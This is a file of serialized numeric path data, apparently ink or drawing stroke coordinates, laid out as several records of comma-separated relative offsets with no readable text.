0-1,0-1 1,6-1-1,13-2 117,-18 4-106,1-1-1,0 1 1,-1-1-1,1 0 1,-1-1-1,1 1 1,3-3-1,-6 3-28,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 1,1 1-1,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,3 1 0,-1 0 6,1 0 1,-1 0-1,0 0 0,0-1 0,1 0 1,-1 0-1,10 1 0,72-8 47,-47 12 2,-37-6-61,21 0 105,73-18-31,-66 18-9,-28 0-68,41 0 99,-43 0-100,0-1-1,1 1 1,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,1 1-1,-1-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,-4 4 18,3-5-21,1 0 0,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,0 1 0,-1-1-1,1 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1-1,1-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,-1-1-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1 0,1-1-1,-1 1 1,0 22 13,0-21-11,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1-1,0-1 1,0 1 0,-1-1-1,1 1 1,0 0-1,0-1 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,0 0 0,-2 3-1,3-4 0,-2 23-5,0-3-147,0-19 126,2-1 25,1 0 0,-1 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0-1 1,-1 1-1,1 0 0,0 0 0,0 0 0,0 0 1,0-1-1,-1 1 0,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,0 0 0,-1 0 0,1-1-163,-23-22-9917,14 16 6628,-2 1 17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4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0 482 200,'0'13'15653,"0"-7"-14139,0-1-1195,0-11 891,54-30 443,-26 21-1618,-18 11-44,-1-1 0,0 0 0,0 0 0,-1-1 0,1 0 0,8-9 0,-11 11 45,0 0 1,0 1 0,1 0-1,-1 0 1,1 0 0,0 1-1,-1 0 1,1 0 0,9 0 0,14-6 147,154-48 137,-118 38-459,63-10 90,-116 24 88,0 0-30,0 1 0,1 0 0,-1 1 0,1 0 0,25 1 0,-21-1 1,1-1 0,0-1 0,-1 0 0,0-1 1,0-1-1,33-16 0,35-10 15,-56 22 33,-23 7-61,1 0 1,0 1-1,0-1 0,0 2 1,0-1-1,11 0 1,67-17 21,133-41 10,-180 50-34,-26 6 0,0 1 1,0 1 0,24-3-1,51-7 19,-22 6-24,-44 6 8,1 1-8,-1-1 0,0-1 0,1-2 0,25-5 0,-29 5 14,1 0 0,-1 1 0,1 1 0,0 0 0,-1 2 0,38 6 0,40 0-57,-59-7 23,0 2 0,44 7 0,-1 4 38,-41-7 50,46 12-1,-72-16-10,0-1 0,0 0 0,0 0 0,0-2 0,-1 1 1,18-5-1,29 1 223,-22 3-180,-21-1-56,-1 2 0,1 0 0,0 1-1,27 6 1,-30-5 58,0-1 0,0 0 0,0 0-1,0-2 1,0 0 0,16-3 0,27 0 407,-31 3-383,-13 0-92,0 1 0,-1 1 0,1 0 1,19 4-1,21-1 53,-7-2-91,134 16 53,7 13 770,-17-1 253,-129-27-1057,-37-3-7,0 0 0,0 0 0,0 0-1,-1 1 1,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,5 3-1,34 4 22,-40-6-18,1-1 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0-1 0,4 1 0,13 4 23,-17-4-18,8 0-8,-1 1 0,1 0 0,-1 0 0,1 2 1,-1-1-1,0 1 0,12 7 0,12 2 109,53 13 464,-66-22-509,0 1 0,0 1 0,-1 1 1,29 13-1,-49-16-69,-1-3 8,31 17-25,-9 13 6,-21-29 1,1 0-1,0 1 0,1-1 1,-1 0-1,0 0 0,1 0 1,-1-1-1,1 1 0,-1-1 1,1 1-1,4 1 0,-5-3 27,19 19 164,-19-16-175,0 0-1,0 0 0,1 0 1,-1 0-1,1 0 0,-1-1 0,1 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 0 0,5 1 0,-1 4 1,-5-5-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1-1,1 1 1,3 0 0,9 9 25,-15-9-25,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,1 0 0,0 0-7,32 6 28,-30-7-15,1 8-12,-5-6 16,0 3-5,0-3-6,-45 17-4564,34-15 2560,0-1 0,-1 0 1,1-1-1,0 0 0,-1-1 1,-16-2-1,-4 1-2001,0 1 8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7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22 28,'0'0'115,"0"-1"0,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,7-5 5994,0 7-3757,-6-11 650,-3 18-1695,-9 14-1218,9-21-82,-1 0-1,1-1 1,0 1 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 0 0,-1 3 0,-9 22 33,8-25-40,1 1 1,-1 0 0,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,0 4 1,0-1-1,0 0 0,0-1 0,-1 1 0,0 0 0,-1-1-1,-4 10 1,1-3 2,-44 72-55,46-79 50,1 1 0,0-1 1,0 1-1,1 0 0,-1 0 0,1 0 0,-2 10 0,4-15-8,0 0-1,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,-1 1 1,1-1 12,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,1 1 0,0 0 1,-1 0-1,1-1 0,0 4 1,-10 19 177,9-22-176,-1 0 0,1 1 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,1 0 0,-2 4 0,0-3-3,0 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,-6 3 0,8-6 0,1 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0-1,-1 1 1,1-1 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,0 2 0,1-3 19,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,18 1-56,-10-1 170,13-1 25,-16 0-147,1 1 0,-1-1 0,1 1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,6 3 0,-6-2-9,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,12-1 0,-16 0-1,26 1 163,1 2 0,-1 1 0,48 13 0,-30-2-149,29 6 7,-53-15 251,0 2 1,0 0 0,0 0 0,26 17-1,-37-16-35,-23-7-393,-27-8-6175,36 5 3984,-29-5-5397,12 1 3778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26 180,'0'-6'6146,"11"-1"-4853,-11-6 3623,-9 15-2017,7-2-1974,2 0-930,1 0 50,-1 0 0,0-1-1,1 1 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1-1,1 1 1,-1 106 63,-11-82-96,0 25-38,0 21 38,11-63 0,1-5 11,-1-1 0,0 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,0 1 0,0-1-1,1 0 1,-1 0 0,0 0-1,-3 4 1,-7 36 302,9-27-64,2-15-250,0 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,0 0 0,0 1 0,0-1 0,-1 0-1,1 0 1,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 1 0,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,-2 0 113,0 10-2161,-6-14-2621,-4-20-3775,12 17 5002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3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32 540,'22'-31'8129,"-22"34"-6068,0 14 1442,0-12-3343,0 0 1,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,-2 8 0,2-9-138,1-1 1,0 0-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1 3 1,-4 24 51,3-27-47,0-1-1,0 1 1,0-1 0,1 1 0,-1-1-1,1 1 1,0 0 0,0 6 0,1-7 1,-1-1 1,0 1-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,0 0 1,0 0-1,-2 4 1,1 12 261,2-18-276,0-1 0,0 0 1,0 0-1,0 1 0,1-1 0,-1 0 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,0-1 1,-1 0-1,1 0 0,0 1 0,0-1 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,0 0 0,0 0 185,10-21 416,-8 20-606,1-1-1,-1 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 1,1-3-1,1-2-4,-1 1 0,1-1 0,0 1 0,1-1 0,0 1 0,0 0 0,0 0 0,1 1 0,6-10 0,13-22 6,-18 29-7,0 1 0,1 0 0,0 1 0,0-1 0,1 1 0,0 0 0,0 1 0,0 0 0,1 0 0,10-5 0,-16 9-7,11-1-23,5 3 9,-16 0 19,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,2 5 0,-2-3-6,-1 0-1,0 1 1,0-1-1,-1 0 1,1 1 0,-1-1-1,0 1 1,0 5 0,-1-3-39,0 0 0,0 1 0,0-1 0,-1 0 0,0 0 1,-6 12-1,-3 14-2412,6 3-5116,5-30 4548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26 1024,'-1'-8'6175,"3"-7"-3378,-1 14-2724,-1 1 1,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0-1,-1 0 1,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,7 17 782,-5-15-807,0 0-1,0 0 0,-1 0 0,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 0,0 1 0,0 5 1,6 22 72,-6-26-84,1 0 1,-2 0-1,1 1 1,0-1-1,-1 1 1,0-1-1,0 0 1,-1 1-1,0-1 1,0 1-1,0-1 1,-3 8 0,-2 24 481,4-29-359,-1 1 1,0-1 0,0 0-1,0 0 1,-1 0 0,-1 0-1,1 0 1,-1-1 0,-1 0-1,-10 12 1,7-12 5,-1 0-1,0 0 1,0 0-1,-1-2 1,0 1-1,0-1 1,0-1-1,-18 5 1,3 0-106,19-7-73,1 0 0,-1 0 1,0-1-1,1 0 1,-1-1-1,0 0 0,0 0 1,0 0-1,1 0 1,-1-1-1,0-1 1,-7-1-1,1 0-119,11 3-143,-1-1 0,1 0 1,-1 1-1,1-1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,1-1 0,-4-3 1,3 4-287,1-1 0,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,1-1 0,0 1 1,-1 0-1,1 0 0,0-1 1,0 1-1,1 0 0,-1 0 1,0-1-1,1 1 0,0-2 1,8-9-2584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1756,'0'0'1908,"18"-6"7911,-18 5-9813,0 1-1,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,6 15-473,-2-7-2750,-2 9-6400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5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90 1288,'-2'2'8351,"20"4"-6218,-13-5-1978,0 0 1,0 0-1,0 0 1,0-1-1,0 0 1,0 0-1,8-1 1,0-4 381,-1-1 0,0 0-1,16-11 1,-8 4 67,-19 13-582,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,0-1 0,-1-1 0,-1 0 30,-1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0 0 1,-1 0-1,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 1 0,0 0 0,1 0 0,-6 3 0,-6 3 104,1 0-1,0 1 0,0 0 1,1 1-1,1 1 0,-1 0 1,2 1-1,-20 23 0,31-33-144,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,0-1-1,-1 1 1,1 0 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,1 1 0,-1-1-1,0 1 1,1-1 0,0 0 0,-1 0 0,1 1 0,0-1-1,2 1 1,8 5 10,0 0 0,0-1-1,22 8 1,-33-14-20,29 12-88,-15-6-186,1 0-1,1 0 1,-1-2 0,25 5-1,-34-9-297,-1 0-1,0 0 1,1 0-1,-1-1 1,0 0-1,8-2 1,-6 1-806,-1-1 0,0 0-1,0 0 1,0-1 0,12-8 0,10-5-2094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19 792,'0'-3'553,"-1"-9"5716,1 11-6200,0 1 0,0 0 0,0 0 0,0 0-1,0-1 1,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1-1,0 1 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-34 15 2576,23-12-2075,1 1 0,0 0 0,1 1 0,-16 10 0,10-3-61,5-6-339,1 1-1,-1 0 1,1 1 0,1 0-1,-1 0 1,2 1-1,-11 15 1,17-22-153,0-1-1,0 0 1,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0-1 0,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,0 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 0 1,0 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0-1-1,1 0 1,-1 1 0,0-1-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1-1-1,1 0 1,-1 1-1,1-1 1,-1 0 0,5-1-1,20 0-433,-1-2 1,0-1-1,0 0 1,0-2-1,48-18 1,-63 19-1499,1-1 1,-1 0 0,-1-1 0,1 0 0,-1 0 0,11-11 0,-8 1-1215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1 768,'0'0'70,"1"0"0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,1-1 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 1 0,-1-1 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0 0,-1 0-1,1 0 1,0 1 0,0-1 0,-1 0 0,-4 22 2215,-6 26 200,11 112 1536,0 78-2534,11-206-1587,-18-26-3918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1748,'0'0'2777,"32"-6"2332,-16 5-3663,0-1 0,0 0-1,16-5 1,-16 3-844,1 1 1,-1 0-1,19 0 1,-18 3-447,-11-1-141,0 1 1,0-1-1,0 1 0,0 1 1,0-1-1,0 1 0,0 0 1,0 0-1,7 4 0,24 6-2176,2-10-4723,-28-1 4186,-1 0-839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7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10 139 96,'0'-2'11875,"0"3"-12196,0-1 466,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1-1,0 0 1,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,4 2 1248,-1-1-1374,-2 3-14,0 300 941,-6-291-936,6-13-9,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 1,0-1-1,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,1 0 0,1-119 1028,-2 114-1024,0-4 3,0 0 0,0 0 0,1 0 0,0 0 0,1 0 0,3-13 1,-1 0-4,5-9-9,4-2 1,6-8 26,13-20 53,-26 54-81,0 0 1,0 1 0,1-1-1,-1 1 1,1 0-1,1 1 1,-1-1-1,1 1 1,0 1-1,0 0 1,0 0-1,1 0 1,-1 1-1,1 1 1,0-1-1,10 0 1,-13 3-4,1 0 0,0 1 0,-1 0 0,1 0 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0 0 0,-1 1 0,11 7 0,-16-10 8,1 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 1,0 1-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 2 0,-32 26-23,26-23 12,-13 8-27,0-1 0,0-1 1,-1-1-1,-1-1 0,0 0 0,0-2 1,-36 8-1,27-6 42,10-2-33,7-3-2992,4-2-2510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46 1428,'-3'-1'423,"1"1"-1,-1 0 0,0 0 1,1 0-1,-1 0 0,0 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 1,-1 0-1,1 0 0,0 0 1,-4 3-1,4-2-315,1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,0-1 0,1 6 0,-1-6-68,1-1 1,-1 0-1,1 1 1,-1-1-1,1 1 1,0-1-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,3 1-1,29 16 933,-21-12-609,-10-5-280,0-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,0-1-1,1 0 0,-1 1 1,1-1-1,-1 0 1,1-1-1,-1 1 0,1 0 1,-1-1-1,1 1 0,-1-1 1,0 0-1,5-2 0,38-23 966,-32 17-861,-12 8-142,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1-3 0,0 4-21,1 1-3,-1 0-1,1-1 1,-1 1 0,0 0-1,1-1 1,-1 1-1,1 0 1,0-1 0,-1 1-1,1-1 1,-1 1 0,1-1-1,0 1 1,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,0 0-1,0 1 1,-1-1 0,1 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,0 1 0,0-1-1,0 0 1,-41-41 917,39 41-905,0 0 1,-1 0 0,1 0-1,0 0 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1 0,-4 0-1,-16-5 336,21 4-337,0 1-1,1-1 1,-1 1 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1-1,0 0 1,-1 0 0,1 1-1,0-1 1,-2 1 0,-9 0 93,11-1 133,0 1-255,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 1 0,1 0 1,-1-1-1,0 1 0,1 0 1,-2 2-1,-2 3 10,5-7-14,0 1 0,-1-1 1,1 0-1,0 0 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 1,0 1-1,-1-1 0,1 0 1,0 1-1,0-1 0,-1 0 0,1 1 1,0-1-1,0 0 0,0 1 1,0-1-1,-1 0 0,1 1 0,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0 0 1,-3 2-7,2-2 7,1-1-1,-1 0 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1 0,1 0-1,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0 0,0-1-1,1 1 1,-1 0-1,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 1,-1-1 0,1 1-1,-1-1 1,1 1-1,-1-1 1,1 0-1,0 1 1,5 11-21,-6-11 17,0 0 1,0-1-1,0 1 1,0-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,0-1 0,1 1 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,-1 0 1,2 1-1,1 3-367,7 8-1185,-9-12 1459,-1 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 0,-1 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,-1 0 1,1 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,9-10-6186,-8 5 3219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36 888,'0'0'107,"1"0"1,0 0-1,-1-1 0,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,0 1 1,-1-1-1,0 1 0,1-1 1,-1 1-1,1-1 0,-1 1 1,1-1-1,-1 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 1 0,-1-2 1,5-3 822,3-8 2872,-10 19-2154,2-5-1293,0-1 0,1 1 1,-1 0-1,1-1 0,-1 1 0,1 0 1,-1-1-1,1 1 0,-1 0 1,1 0-1,0 0 0,-1 0 1,1-1-1,0 1 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 1 1,11 58 72,0-29-334,-1-9 61,-9-21-140,1 1 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,0 4 0,2-1-9,-2-4-10,-1 0 1,1-1 0,0 1-1,-1 0 1,1 0 0,-1-1-1,1 1 1,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1-1 1,0 1-1,0 0 1,0 0 0,0 0-1,0 2 1,1 11-572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1 244,'0'0'6759,"2"18"1697,4-17-8269,0 0 0,0 1 0,-1 0 0,1 0-1,-1 0 1,0 1 0,1 0 0,-1 0 0,0 0-1,0 0 1,-1 1 0,6 5 0,22 14 104,31 14-80,-54-30-276,8 5-552,-17-12 501,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,1-1 0,-1 1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,1-1 0,-1 1-1,0 0 1,0 0 0,0 0 